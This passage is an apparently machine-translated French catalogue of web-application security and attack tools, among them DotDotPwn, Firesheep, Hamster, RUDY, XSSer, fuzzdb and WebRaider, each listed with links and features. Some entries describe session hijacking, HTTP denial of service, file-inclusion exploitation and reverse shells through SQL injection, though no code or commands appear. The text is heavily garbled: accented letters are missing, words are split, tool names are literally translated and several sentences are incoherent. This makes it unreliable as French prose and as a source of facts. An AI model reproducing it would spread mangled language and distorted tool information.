clickjacking. En part ie, cela peut tre d la difficult de visualiser comment fonctionne la technique dans la pratique.

Ce nouvel outil bas sur un navigateur permet un utilisateur d'exprimenter avec cli ckjacking techniques en utilisant le point-and-click de choisir visuellement les diffrents lments dans une page Web d'tre la cible. L'outil permet galement de techni ques clickjacking plusieurs prochaine gnration tre utilis, tel que prsent dans Paul S one Blackhat Europe 2010 parler. Parmi les caractristiques de ce nouvel outil sont: * Utilisez le point-and-click pour slectionner les zones d'une page d'tre la cible * Prise en charge technique de la nouvelle 'injection champ de texte " * Prise en charge technique de l'extraction de contenu de la nouvelle

replay mode visible * permettant un utilisateur de voir comment fonctionne la tech nique derrire la science replay 'mode cach' * permet les mmes tapes pour tre rejou d'une manire cache, simulant une attaque clickjacking rel. L'outil est actuellement un stade prcoce beta, et fonctionne mieux dans Firefox 3 .6. Prise en charge complte pour les autres navigateurs suivront sous peu. Pour d e plus amples renseignements, s'il vous plat consultez le fichier Lisezmoi.txt da ns l'outil tlchargeable. Darkjumper http://sourceforge.net/projects/darkjumper/ Darkjumper.py Dvelopp par: mywisdom & gunslinger_ Cet outil va essayer de trouver tous les sites Web qui hbergent sur le mme serveur sur votre cible, puis de vrifier chaque vulnrabilit de chaque site qui le mme serve ur Fonctions de darkjumper: 1. recensement de l'utilisateur deviner sur la base du procs 4-8 signes prlevs sur chaque nom de site qui les accueillent sur le mme serveur. 2. Scan pour l'injection sql, l'inclusion de fichiers locaux, l'inclusion de fic hiers distants et aveugle d'injection sql sur tous les sites sur le mme serveur. 3. CGI et le chemin de balayage. 4. Port-la numrisation 5. Auto-bruteforcing aprs l'numration d'utilisateur 6. Auto-injecteur - trouvez colonne auto (mysql) s'il est reconnu bug trouv mysql 7. Proxy ajout 8. Verbocity ajout 9. IP ou un proxy checker et GeoIP utile pour vrifier votre adresse IP ou votre t ravail proxy ou non. DotDotPwn http://dotdotpwn.blogspot.com/ Un outil simple perl qui dtecte plusieurs Directory Traversal Vulnerabilities sur les serveurs HTTP / FTP. Cette version a AttackDB actuellement: 871 charges uti les parcours (et plus!). http://chr1x.sectester.net/toolz/ddpwn/

* Dtecte les vulnrabilits traverse de rpertoire distance sur HTTP / systmes serveur F P. * Actuellement, la base de donnes traverse dtient 881 charges utiles attaque. Utili sez l'option la mise jour effectuer une mise jour en ligne frais. * Les chques DotDotPwn la prsence de boot.ini sur les systmes vulnrables par le biai s des vulnrabilits traverse de rpertoires, il est donc suppos que les systmes tests so t Bas sur Windows serveurs HTTP / FTP. Firesheep http://codebutler.github.com/firesheep/ extension pour Firefox qui dmontre session HTTP dtournement attaques Lorsque vous vous connectez un site Web vous dmarrez gnralement en soumettant votre nom d'utilisateur et mot de passe.Le serveur vrifie ensuite si un compte corresp ondant cette information existe et si oui, rpond de nouveau vous avec un cookie qui est utilis par votre navigateur pour toutes les demandes ultrieures.

Elle est trs frquente pour les sites protger votre mot de passe par le chiffrement de la connexion initiale, mais tonnamment rare pour des sites Web pour crypter to ut le reste. Cela laisse le cookie (et l'utilisateur) vulnrables. dtournement de s ession HTTP (parfois appel sidejacking"), c'est quand un attaquant obtient une pri se de cookies d'un utilisateur, leur permettant de faire quoi que ce soit l'util isateur peut faire sur un site particulier. Dans un rseau sans fil ouvert, les co okies sont essentiellement cri dans l'air, faisant de ces attaques extrmement faci le. Firesheep est gratuit, open source, et est dsormais disponible pour Mac OS X et W indows. le support de Linux est sur le chemin. Des sites Web ont la responsabilit de protger les personnes qui dpendent de leurs s ervices. Ils ont fait fi de cette responsabilit depuis trop longtemps, et il est temps pour tout le monde rclamer un Web plus sr. Mon espoir est que Firesheep aide ra les utilisateurs de Windows. Vitesse-sol http://groundspeed.wobot.org/ Vitesse-sol est un open-source extension Firefox pour les testeurs de scurit des a pplications web prsent la DC OWASP AppSec 2009. Il vous permet de manipuler l'inte rface utilisateur de l'application Web pour liminer les limitations gnantes et con trles ct client qui interfrent avec le test de pntration des applications web. Hamster http://hamster.erratasec.com/ Hamster est un outil pour la session HTTP avec dtournement passive sniffing. Il l e fait, en reniflant sur un rseau, de capturer les cookies de session, de les imp orter dans le navigateur pour vous permettre de dtourner leur session! session HT TP dtournement ou SideJacking est l'endroit o vous dtourner une session Web existan t avec un service distant en interceptant et en utilisant les informations d'ide ntification (normalement cookies de session) qui a identifi l'utilisateur de ce s erveur spcifique. JBroFuzz http://sourceforge.net/projects/jbrofuzz/files/ JBroFuzz est un fuzzer application web pour les demandes faites via HTTP et / ou H TTPS. Son but est de fournir une seule application portable qui offre protocole web stable fuzzing capacits. Notes de mise (2,3): Plusieurs instances peuvent dsormais enregistrer des donnes dans des rpertoires dif frents lancement, en vertu: Prfrences -> Annuaire Sites Gardez Histoire de dir prcdente: Fichier -> Enregistrer sous -> Enregistrer, Fichi er -> Ouvrir, Fichier Correction fonctionnalit de recherche lors de l'affichage des rponses fuzzing (thx Markus!) Ajout d'un bouton de swap, dans la fentre Encoder, plus amis Encoder / Hash est maintenant aussi un pot standalone / exe Ajout clic droit encoder / dcoder fonctionnalit dans l'onglet Fuzzer - Demande de t exte du panneau Ajout d'un standalone jbrofuzz-core-2.3.jar bibliothque de fuzzing API Notes de version (2.1): - Ctrl + M pour charger vos propres fuzzers partir d'un fichier jbrf. - Suppression de l'ajout de sauts de ligne par dfaut la fin de chaque requte, assu rez-vous de savoir ce que vous fuzzing!

- On The Wire: option clic droit, clair et aussi de choisir de voir les demandes et / ou des rponses - Ajout d'ASCII 85 (045-A85-RFC) et imprimables ASCII 94 (046-A94-CHR) fuzzers. - Base32 et zBase32 Encode / Decode fonctionnalit ajoute - JBroFuzz enregistre dsormais dans le journal quotidien (thnx Ranulf!) - Vous pouvez charger vos charges personnalis en plaant un fichier nomm fuzzers.jbr f dans votre rpertoire de travail. - Ajout de 3 nouvelles fuzzers extension de fichier (thnx Adam) Les composants de JBroFuzz sont tous intgrs dans une seule fentre et peut tre consult ar les diffrents onglets. Ces onglets sont les suivants: Fuzzing * L'onglet fuzzing est l'onglet principal de JBroFuzz, responsable de toutes les oprations de fuzzing ralise sur le rseau. En fonction de la charge utile fuzzer slec tionn, il cre les donnes malformes pour chaque demande, il met sur le fil et crit la rponse un fichier. Graphing * L'onglet graphique est responsable pour la reprsentation graphique (dans une va rit de formes), les rponses reues pendant fuzzing. Cet onglet peut offrir une indica tion claire d'une rponse qui est diffrente du reste reu, une indication de l'examen complmentaire. Manipuler * L'onglet charges utiles est une collection de fuzzers avec leurs charges corre spondant qui peut tre utilis pendant fuzzing. Les charges utiles sont ajouts la dem ande dans l'onglet fuzzing; une vision plus claire de ce que les charges utiles sont disponibles, la faon dont ils sont regroups et quelles sont les proprits de cha que fuzzer a peut tre vu dans cet onglet. En-ttes * L'onglet ttes est une collection de ttes navigateur qui peut tre utilis pendant fu zzing. En-ttes sont obtenus partir de diffrents navigateurs sur les diffrentes plat es-formes et systmes d'exploitation. En-ttes * L'onglet en-ttes est une collection de ttes navigateur qui peut tre utilis pendant fuzzing. En-ttes sont obtenus partir de diffrents navigateurs sur les diffrentes p lates-formes et systmes d'exploitation. Cet onglet est fourni, comme beaucoup d'a pplications web rpondent diffremment aux diffrentes attaques d'emprunt d'identit nav igateur. Systme * L'onglet systme reprsente l'exploitation de la console de JBroFuzz l'excution. Ici, vous pouvez accder des informations d'excution Java, voir toutes les erreurs qui pourraient se produire et aussi suivre le fonctionnement en termes d'vnements tant connect. LFImap http://code.google.com/p/lfimap/ Ce script est utilis pour prendre le plus beneficts du fichier local comprennent la vulnrabilit dans le serveur web

Un nouvel outil simple a t rcemment publi, qui se concentre uniquement sur les attaq ues LFI. Fonctions * * * * * * Automatiquement trouver la racine du systme de fichiers Les fichiers par dfaut de dtection en dehors du dossier web Les tentatives visant dtecter les mots de passe dans les fichiers Prend en charge l'authentification de base Peut utiliser octet nul de contourner certains contrles Rdiger un rapport de l'analyse d'un fichier

Mantra http://www.getmantra.com/index.html Mantra est un rve devenu ralit. Il s'agit d'une collection d'outils libres et open source intgr un navigateur web, qui peut devenir trs pratique pour les tudiants, les testeurs de pntration, les dveloppeurs d'applications web, professionnels de la scu rit, etc Il est portatif, prt--l'emploi, compact et suit le vritable esprit des logi ciels libres et open source. Mantra est un cadre de scurit qui peut tre trs utile da ns l'exercice de tous les cinq phases d'attaques, dont la reconnaissance, de numr isation et de recensement, l'accs, l'escalade de privilges, de maintenir l'accs, et brouiller les pistes. En dehors de cela il contient galement un ensemble d'outil s pour les dveloppeurs Web et les dbogueurs de code qui rend trs pratique la fois p our la scurit offensive et dfensive des tches de scurit connexes. Mantra est lite, flexible, portable et facile utiliser avec une interface utilis ateur graphique agrable. Vous pouvez le garder dans les cartes mmoire, lecteurs fl ash, CD / DVD, etc Il peut tre excut en mode natif sur Linux, Windows et Mac. Il pe ut galement tre install sur votre systme en quelques minutes. Mantra est absolument gratuit et ne prend pas de temps pour vous de mettre en place. Netsparker

http://www.mavitunasecurity.com/ Netsparker peut dtecter et de signaler les problmes de scurit tels que l'injection SQ et Cross-Site Scripting (XSS) dans toutes les applications web indpendamment de la plate-forme et de la technologie dont ils sont construits. unique de dtection Netsparker et techniques d'exploitation lui permet d'tre morts prcises dans les rapports o il est le premier et le seul faux positif web gratuit de l'application de balayage de scurit R U Dead Yet http://code.google.com/p/r-u-dead-yet/ RU-Dead-Pourtant, court ou RUDY, met en uvre les gnriques HTTP DoS attaque via long observations champ de formulaire. La thorie de l'attaque est dcrit dans l'article suivant: http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf Cet outil fonctionne avec un menu interactif de la console, dtection automatique de formes dans les URL donne, et permettant l'utilisateur de choisir les formulai res et les champs de formulaire sont souhaitables utiliser pour l'attaque POST. En outre, l'outil propose d'excution sans assistance en fournissant les paramtres ncessaires dans un fichier de configuration. SAHI

http://sahi.co.in/w/ Sahi est un outil d'automatisation pour tester les applications web. Sahi inject e javascript dans les pages web en utilisant un proxy et le javascript permet d' automatiser les applications Web. Sahi est un outil convivial testeur. Il rsums en plus de difficults que les testeur s face tout en automatisant les applications web. Certains traits saillants incl uent un excellent graveur, plate-forme et l'indpendance navigateur, XPaths, aucun e priode d'attente, la lecture multi-thread, une excellente interaction Java et a u reporting intgr. Caractristiques * * * * * * * * * * Le navigateur et systme d'exploitation indpendant Enregistreur puissant qui fonctionne sur les navigateurs Spy objet puissant API simple et intuitive Javascript bas scripts pour le contrle de la bonne programmation Version contrlables scripts bas sur du texte Dans les rapports de construction Dans la lecture de construction multi-thread ou en parallle des tests Tests n'avez pas besoin de la fentre du navigateur pour tre en bref Commande en ligne et la fourmi de soutien pour l'intgration dans l'laboration de processus * Prise en charge proxy externe, HTTPS, 401 & NTLM authentification popups navigateur * Prise en charge et de botes de dialogue modales * Prise en charge d'AJAX et des applications web trs dynamique * Scripts trs robuste * Fonctionne sur des applications avec des identifiants alatoires auto-gnrs * Trs lger et extensible * Prise en charge des tests pilots par les donnes. Peut se connecter la base de do nnes, fichier Excel ou CSV. * Possibilit d'invoquer n'importe quelle bibliothque Java partir de scripts Limitations Jeux de cadres * / pages avec frames / iframes chargement des pages de plusieurs domaines n'est pas pris en charge. Sahi ne peut pas grer les pages qui ont d'aut res pages de diffrents domaines noys dans la masse en utilisant les iframes ou cad res. Donc, vous ne pouvez pas avoir une page de google.com ayant une iframe sur une page de yahoo.com. Notez que ce n'est pas la mme que la commutation entre des domaines, o vous naviguez d'une page une page google.com yahoo.com, qui travaill era en Sahi. * Tlchargement de fichiers champ ne sera pas peuple sur les navigateurs pour la vrif ication javascript. Tlchargement de fichiers lui-mme fonctionne bien SandCat http://www.syhunt.com/?n=Sandcat.Sandcat Notre connaissance approfondie des questions de scurit, les nouvelles technologies Web 2.0 comme AJAX, les technologies traditionnelles de Web, et les langages de programmation Web tels que PHP, nous a permis de livrer exactement ce que nous avons cherch fournir - l'application web plus riche en fonctionnalits et avances sc anner de scurit disponibles ce jour. SandCat combine Syhunt de l'tat de l'art-, multi-processus d'analyse des technolo gies de la langue incroyablement rapide LUA pour effectuer distance scans scurit d es applications web. Bien que spidering une vulnrabilit site web et de la chasse, SandCat mule un moderne, navigateur Web HTML 5-courant. Tlchargez-le et regardez pa r vous-mme!

WSFuzzer http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project WSFuzzer est un programme sous licence LGPL, crit en Python, qui cible actuelleme nt des services Web. Dans la version actuelle HTTP en fonction des services SOAP sont la cible principale. Cet outil a t cr sur la base, et d'automatiser, de certai ns manuels du monde rel SOAP stylo travail d'essai. Cet outil n'est pas destin tre un remplacement pour une analyse manuelle solides de l'homme. S'il vous plat cons ulter WSFuzzer comme un outil pour augmenter l'analyse effectue par des professio nnels comptents et bien informs. Services Web ne sont pas ngligeables dans la natur e afin expertise dans ce domaine est un must pour les essais stylo appropri. WackoPicko https: / / github.com / adamdoupe / WackoPicko WackoPicko est une application web vulnrable utilis pour tester des applications w eb scanners de vulnrabilit. - Lire la suite Observateur

http://websecuritytool.codeplex.com/ Watcher est un outil d'excution passive-analyse pour HTTP applications Web. tre pa ssive signifie qu'il ne sera pas endommager les systmes de production, il est com pltement sr pour employer dans le calcul de Cloud, hbergement mutualis, hbergement ddi et des environnements. Watcher dtecte les problmes de scurit des applications Web ai nsi que les problmes de configuration oprationnelle. Watcher fournit pen-testers h ot-spot de dtection de vulnrabilits, les dveloppeurs de tests de validit rapide, et l 'audit vrificateurs de la conformit PCI. Il cherche des questions lies mashups, des charges utiles contrl par l'utilisateur (XSS potentiels), des biscuits, des comme ntaires, des en-ttes HTTP, SSL fuites referrer, Flash, Silverlight, la divulgatio n d'informations, Unicode, et plus WebCruiser http://sec4app.com/ WebCruiser - Web Vulnerability Scanner, un outil web compact mais puissant de ba layage de scurit qui vous aide dans l'audit de votre site! Il a un scanner de vulnr abilit et d'une srie d'outils de scurit. Il peut prendre en charge le site de numrisation ainsi que POC (prooving of conce pt) de vulnrabilits web: les injections SQL, Cross Site Scripting, injection XPath , etc Donc, WebCruiser est galement un outil d'injection SQL automatique, un outi l d'injection XPath, et un Cross Site Scripting outil! Fonction: * Sur chenilles (annuaires de sites et fichiers); * Vulnerability Scanner (Injection SQL, Cross Site Scripting, injection XPath, e tc); * POC (Proof of Concept): Injection SQL, Cross Site Scripting, injection XPath, etc; * GET / Post / Cookie injection; * SQL Server: PlainText / Union / Injection aveugles; MySQL/DB2/Access *: Union / Injection aveugles; Oracle *: Union / Blind / Injection CrossSite; Donnes Post * Renvoyer; * Recherche d'entre de l'administration; Delay Time * pour l'injection de la recherche; Auto * Obtenez Cookie partir du navigateur Web pour l'authentification; * Rapport de sortie.

WebScarab NG https: / / code.google.com / p / WebScarab-ng / http://www.owasp.org/index.php/OWASP_WebScarab_NG_Project WebScarab-NG est une rcriture complte de l'ancienne application WebScarab, avec un accent particulier sur la prise de l'application plus conviviale. WebScarab est un cadre d'analyse des applications qui communiquent en utilisant les protocoles HTTP et HTTPS. Il est crit en Java, et est donc portable sur de no mbreuses plateformes. WebScarab a plusieurs modes de fonctionnement, mis en uvre par un certain nombre de plugins. Dans son utilisation la plus courante, WebScar ab fonctionne comme un proxy d'interception, permettant l'oprateur d'examiner et de modifier les demandes cres par le navigateur avant de les envoyer au serveur, e t d'examiner et de modifier les rponses renvoyes par le serveur avant qu'ils soien t reus par le navigateur .WebScarab est capable d'intercepter les communications HTTP et HTTPS. L'oprateur peut galement examiner les conversations (demandes et rpo nses) qui ont travers WebScarab. WebSecurity http://code.google.com/p/websecurify/ Websecurify Security Testing cadre identifie les failles de scurit Web par l'utili sation du navigateur d'automatisation, la dcouverte et fuzzing technologies. Le c adre est crit en JavaScript et excute avec succs dans de nombreuses plateformes, y compris les navigateurs modernes avec l'appui de HTML5, xulrunner, xpcshell, Jav a, V8 et d'autres. Est un site Web et Websecurify web2.0 initiative de scurit spcialise dans les recherc hes sur des questions de scurit et de la construction de la prochaine gnration d'out ils la dfaite et de protger les technologies du web." Cette version contient les amliorations suivantes: des amliorations d'interface utilisateur * * Plus rapide, plus stable plateforme de test * Le dveloppement d'extensions Amlioration de l'API * Moins de faux positifs * Des gains importants tests de performance * Prise de captures d'cran automatique vulnrabilit * Intgration avec le Rseau Websecurify * Amlioration des stratgies de fuzzing * Perspectives d'espace de travail * L'application intgre et l'extension mises jour automatiques XSSer http://xsser.sourceforge.net/ XSSer est un outil open source tests de pntration qui automatise le processus de dt ection et d'exploitation injections XSS contre les diffrentes applications. Il contient plusieurs options pour essayer de contourner certains filtres, et de diverses techniques spciales d'injection de code. XSSploit

http://www.scrt.ch/pages_en/xssploit.html XSSploit est un multi-plate-forme de type Cross-Site Scripting scanner et exploi teur crit en Python. Il a t dvelopp pour aider la dcouverte et l'exploitation des vul abilits XSS dans les missions de tests de pntration.

Quand il est utilis contre un site Web, XSSploit rampe premier tout le site et id entifie les formes rencontres. Il analyse ensuite ces formes de dtecter automatiqu ement les vulnrabilits existantes XSS ainsi que leurs principales caractristiques. Les vulnrabilits ont t dcouvertes peuvent ensuite tre exploite en utilisant l'exploit oteur de gnration de XSSploit. Cette fonctionnalit extensible permet de choisir le comportement souhait exploiter et gnre automatiquement le lien correspondant HTML i ntgrant l'exploit de charge utile. XSSploit est livr avec plusieurs fichiers: - Xssploit.py: Le fichier principal. Contient le noyau XSSploit et l'interface d e ligne de commande. - Gui.py: L'interface utilisateur graphique. - Extensions.txt: araigne de XSSploit explore les pages Web en utilisant les expr essions rationnelles. Ce fichier contient les extensions de fichier sur le serve ur qui doit tre spidered. Pour ajouter une nouvelle extension, il suffit d'ajoute r une nouvelle ligne dans ce fichier et crivez votre extension. Ne pas oublier le point. - Exploits.xml: La base de donnes exploits. S'il vous plat se rfrer ce fichier pour crer de nouveaux exploits. - Report.xsl: Cette feuille de style est un exemple trs basique sur la faon d'affi cher le rapport gnr par XSSploit. Placez ce fichier dans le mme dossier que le rappo rt XML et pointez votre navigateur sur le fichier de rapport pour voir le rappor t. Acunetix

http://www.acunetix.com/cross-site-scripting/scanner.htm Acunetix Web Vulnerability Scanner (WVS) est une application web automatise des t ests de scurit outil que les applications Web de votre audits en vrifiant les vulnra bilits exploitables piratage. scans automatiss peuvent tre compltes et vrifies par rec upement avec la varit d'outils manuels pour permettre site Web complet et les test s de pntration des applications web. DAVtest http://code.google.com/p/davtest/ DAVtest tests WebDAV serveurs en tlchargeant les fichiers de test excutable, puis (v entuellement) le tlchargement de fichiers qui permettent l'excution de commandes ou d'autres actions directement sur la cible. Il est destin aux testeurs de pntration de dterminer rapidement et facilement si elle est active services DAV sont exploi tables. DAVtest prend en charge: * * * * * * Envoi automatique d'exploiter les fichiers Randomisation automatique du rpertoire pour aider cacher des fichiers Envoyez des fichiers texte et essayer de MOVE pour nom de l'excutable De base et l'autorisation Digest Nettoyage automatique des fichiers tlchargs Envoyer un fichier arbitraire

violoneux http://www.fiddler2.com/fiddler2/ Fiddler est un proxy Web Dbogage qui enregistre toutes les HTTP (S) le trafic ent re votre ordinateur et l'Internet. Fiddler vous permet d'inspecter tous les HTTP (S) de la circulation, les points d'arrt ensemble, et "violon" avec les donnes en

trant ou sortant. Fiddler comprend un sous-systme de script puissant bas sur les vne ments, et peut tre tendu en utilisant n'importe quel langage. NET. Fiddler est un freeware et peut dboguer le trafic partir de pratiquement n'import e quelle application, y compris Internet Explorer, Mozilla Firefox, Opera, et be aucoup plus. FIMAP http://http://code.google.com/p/fimap/ FIMAP est un outil peu python qui peuvent trouver, prparer, d'audit, d'exploiter et mme Google automatiquement pour locaux et distants bugs inclusion de fichiers dans webapps. FIMAP devrait tre quelque chose comme sqlmap seulement pour les bug s LFI / RFI au lieu de l'injection SQL. Il est actuellement en cours de dveloppem ent mais il est utilisable. Le but de FIMAP est d'amliorer la qualit et la scurit de votre site web. fuzzdb http://code.google.com/p/fuzzdb/ fuzzdb est un ensemble complet de squences connues modle d'attaque, des endroits p rvisibles, et les messages d'erreur pour le test force intelligente brute et l'id entification condition d'exploiter des applications web. De nombreux mcanismes d'attaque utiliss pour exploiter les diffrentes plates-formes de serveur web et applications sont dclenches par des mta-caractres particuliers qu i sont observes dans plus d'un avis de scurit du produit. fuzzdb est une base de do nnes des modles d'attaque connue pour avoir caus exploiter des conditions dans le p ass, classes par type d'attaque, la plate-forme, et l'application. En raison de la popularit d'un petit nombre de types de serveur, les plates-forme s et des formats de paquets, des ressources telles que les fichiers journaux et des rpertoires administratifs sont gnralement situs dans un petit nombre d'endroits prvisibles. Une base de donnes complte de ceux-ci, tris par type de plateforme, fait fuzz force brute de tester une approche de type scalpel. Depuis les erreurs du systme contiennent des chanes prvisible, fuzzdb contient des listes de messages d'erreur l'encontre motif correspondant de sortie du serveur afin de faciliter la dtection des dfauts logiciels de scurit. Les sources primaires utilises pour la recherche modle d'attaque: * La recherche de vieux exploits sur Internet pour les chanes attaque rptable * modles de scanner raclage http journaux * Divers livres, articles, blogs, mailing liste fils * modles glans dans d'autres fuzzers open source et des outils pentest * analyse des app installe par dfaut * Systme de documentation de l'application et messages d'erreur * C'est comme un scanner non-automatis, sans le scanner. iExploder http://code.google.com/p/iexploder/ Si vous aimez fuzz-force de votre chemin dans trouver des vulnrabilits, les chance s sont que vous aimerez iExploder. Il est inspir du mangleme autre outil similair e pour trouver des problmes de scurit et de fiabilit dans les navigateurs web.

Il se nourrit le navigateur l'tude avec un mauvais code HTML et CSS, afin de test er sa stabilit et sa scurit. Il se nourrit en permanence les navigateurs de mauvais es donnes dans l'espoir qu'ils finiront par accident. Il a t conu pour fonctionner p endant des heures, voire plusieurs jours jusqu' ce que le plantage du navigateur. iExploder est disponible sous forme d'un harnais navigateur complet, le serveur web autonome ou d'un script CGI. Quelques-unes de ses caractristiques sont les suivantes: * Tests tous les attributs HTML et CSS que Mozilla, Webkit et d'autres navigateu rs prennent en charge * Basic fuzzing pour les formats de mdias (bmp, gif, ico, JNG, jpg, ogg, png, snd , svg, tiff, wav, XBM, XPM) * Trs manipulation du DOM de base fuzzing via JS * En-tte HTTP fuzzing * CSS Selector fuzzing * Logic, dpassement de mmoire tampon, et les essais de chane de format * Un nombre illimit de tests reproductibles * Essais testcase squentielle et alatoire, avec la possibilit de reprendre (uniquem ent squentiel) * Outils pour aider isoler le test s'est cras le navigateur, ainsi que trouver de l'information backtrace mitmproxy http://mitmproxy.org/ est une mitmproxy SSL-capable, interceptant proxy HTTP. Il fournit une interface de console qui permet les flux de circulation doivent tre inspects et dit la vole. mitmdump est la version en ligne de commande mitmproxy, avec les mmes fonctionnal its, mais sans fioritures. Pensez tcpdump pour HTTP. Caractristiques * * * * * Intercepter et de modifier le trafic HTTP la vole Sauvegarder les conversations HTTP pour les rejouer plus tard et l'analyse Replay fois clients et serveurs HTTP Apporter des modifications de script pour le trafic HTTP en utilisant Python Interception SSL certs gnr la vole

monkeyfist http://hexsec.com/misc/monkeyfist/ MonkeyFist est un outil qui cre des faux demande dynamique base sur des donnes inte r-domaines de fuite. L'outil construit alors une charge utile sur la base de don nes dans le fichier payloads.xml et l'envoie au navigateur de l'utilisateur. Cela peut inclure les donnes de session en contournant les mcanismes de protection pou r Cross-Site Request Forgery. pinata http://code.google.com/p/pinata-csrf-tool/ Pinata est un script python qui va gnrer Proof of Concept CSRF HTML partir de la r equte HTTP. faux Cross-Site Request, galement connu comme une attaque en un seul clic ou chev al session et en abrg CSRF (mer-surf) ou XSRF, est un type de "malveillants exploi tent d'un site Web o des commandes non autorises sont transmises par un utilisateu r que le site Web de fiducies . Pinata est un script python qui va gnrer Proof of Concept CSRF HTML partir de la requte HTTP.

Vue d'ensemble: - L'outil va gnrer une preuve de concept CSRF HTML donn une requte HTTP. Il vrifie au tomatiquement s'il s'agit d'un EEG ou une requte POST et avec une validation supp lmentaire de la norme et POST "multipart / form POST. - L'outil va alors crer un fichier HTML correspondant au type de la demande. - L'EEG CSRF HTML comprend IMG SRC tag avec pour valeur l'URL l'essai. - Le POST CSRF HTML est cre avec auto prsenter sous forme de script java avec les n oms et les valeurs de la requte HTTP. w3af http://w3af.sourceforge.net/ w3af est une application Web Attack et Cadre de vrification. L'objectif du projet est de crer un cadre pour trouver et exploiter les vulnrabilits des applications W eb qui est facile utiliser et tendre. watobo http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page WATOBO est destin permettre aux professionnels de la scurit d'effectuer trs efficace (semi-automatique) des audits de scurit des applications Web. Nous sommes convain cus que l'approche semi-automatique est le meilleur moyen d'effectuer un audit p rcis et d'identifier la plupart des vulnrabilits. WATOBO n'a pas de capacits d'attaque et est fournie des fins juridiques audit de vulnrabilit que WATOBO fonctionne comme un proxy local, semblable WebScarab, Paros ou BurpSuite. En outre, WATOBO soutient les contrles passifs et actifs. Les contrles passifs son t plus comme des fonctions de filtrage. Ils sont utiliss pour recueillir des info rmations utiles, par exemple, e-mail ou des adresses IP. Les contrles passifs ser ont effectus pendant les activits de navigation normale. Aucune des demandes supplm entaires sont envoyes l'application (web). contrles Active au lieu produira un nombre lev de demandes (selon le module de cont rle) parce qu'ils ne la partie automatique de l'identification de la vulnrabilit, p ar exemple lors d'une analyse. watobo http://watobo.sourceforge.net/ WATOBO est destin permettre aux professionnels de la scurit d'effectuer trs efficace (semi-automatique) des audits de scurit des applications Web. Nous sommes convain cus que l'approche semi-automatique est le meilleur moyen d'effectuer un audit p rcis et d'identifier la plupart des vulnrabilits. WATOBO n'a pas de capacits d'attaque et est fournie des fins juridiques audit de vulnrabilit seulement. WATOBO fonctionne comme un proxy local, semblable WebScarab, Paros ou BurpSuite. En outre, WATOBO soutient les contrles passifs et actifs. Les contrles passifs son t plus comme des fonctions de filtrage. Ils sont utiliss pour recueillir des info rmations utiles, par exemple, e-mail ou des adresses IP. Les contrles passifs ser ont effectus pendant les activits de navigation normale. Aucune des demandes supplm entaires sont envoyes l'application (web). contrles Active au lieu produira un nombre lev de demandes (selon le module de cont rle) parce qu'ils ne la partie automatique de l'identification de la vulnrabilit, p

ar exemple lors d'une analyse. webinject http://www.webinject.org/ WebInject est un outil gratuit pour les tests automatiss d'applications Web et se rvices Web. Il peut tre utilis pour tester diffrents composants du systme qui ont de s interfaces HTTP (JSP, ASP, CGI, PHP, AJAX, Servlets, les formulaires HTML, XML / SOAP Web Services, REST, etc), et peut tre utilis comme un harnais de test pour crer une suite de [HTTP niveau] fonctionnels automatiss, d'acceptation, et des te sts de rgression. Un atelier de test vous permet d'excuter de nombreux cas de test et de recueillir / rapport de vos rsultats. WebInject offre en temps rel l'affich age des rsultats et peut galement tre utilis pour surveiller les temps de rponse du s ystme. WebInject peut tre utilis comme un cadre de test complet qui est contrle par l'inter face WebInject utilisateur (GUI). Eventuellement, il peut tre utilis comme un lanc eur de test autonome (text / application console) qui peut tre intgr et appele parti r de cadres d'autres tests ou des applications. webraider http://code.google.com/p/webraider/ WebRaider est un plugin bas outil automatis d'exploitation des applications web qu i se concentre pour obtenir un shell partir de cibles multiples ou point d'injec tion. Ide de cette attaque est trs simple. Obtenir un shell inverse d'une injection SQL avec une demande sans l'aide d'un canal supplmentaire comme TFTP, FTP pour transfr er la charge initiale. * C'est une seule demande donc plus rapide, * Simple, vous n'avez pas besoin d'un outil, vous pouvez le faire manuellement l 'aide de votre navigateur ou une simple approximation MITM, * Il suffit de copier coller de la charge utile, * CSRF (pouvoir), Il est possible de concevoir un lien et de raliser une attaque de type CSRF qui vous donnera une coque arrire, * Il n'est pas fixe, vous pouvez modifier la charge utile, * Elle est courte, gnralement pas plus de 3.500 caractres, * Ne ncessite pas de demande sur le systme cible, comme FTP, TFTP ou debug.exe, * Facile automatiser. Dpendances En interne WebRaider utilise Metasploit. Les auteurs utilisent une version spcifi que de Metasploit, mais ils ont rduit la graisse de Metasploit pour le lancer plu s rapidement et le rendre plus petit. Vous pouvez changer les chemins et le fair e fonctionner avec la dernire Metasploit de votre propre installation. A noter galement en raison de l'obus inverse et composants Metasploit ce logiciel sera dtect un virus par le logiciel AV X5 http://xss.codeplex.com/ X5 est un addon Fiddler qui vise aider les testeurs de pntration dans la recherche cross-site scripting vulnrabilits. Il injecte ASCII pour trouver des problmes d'en codage traditionnelles, et il injecte des caractres spciaux Unicode et les encodag es de dterminer o les filtres XSS peut tre contourn. Par auto-injection caractre spcia l-sondes dans tous les X5 entres permet de dtecter lorsque le caractre mis peut tre m

al cod ou transform d'une manire vulnrables. La mthodologie utilise par X5 est d'injec ter de petites sondes qui ne constituent pas une charge de travail XSS. En d'aut res termes, X5 sera pas injecter des charges utiles XSS nulle part, elle vise si mplement identifier les problmes d'encodage de caractres et de transformation qui conduisent des XSS. actes X5 en tant qu'assistant au testeur de scurit en acclrant le processus de manip ulation des paramtres et l'agrgation des rsultats pour un affichage rapide. Il auto matise une partie des travaux prliminaires des tests XSS en numrant et en injectant des canaris dans tous les domaines d'entre / paramtres envoys une demande et d'ana lyser comment ces canaris ont t mises plus tard.Par exemple, A t la sortie mis cod en oute scurit ou non? Avez-un caractre inject transformer en quelque chose d'autre?

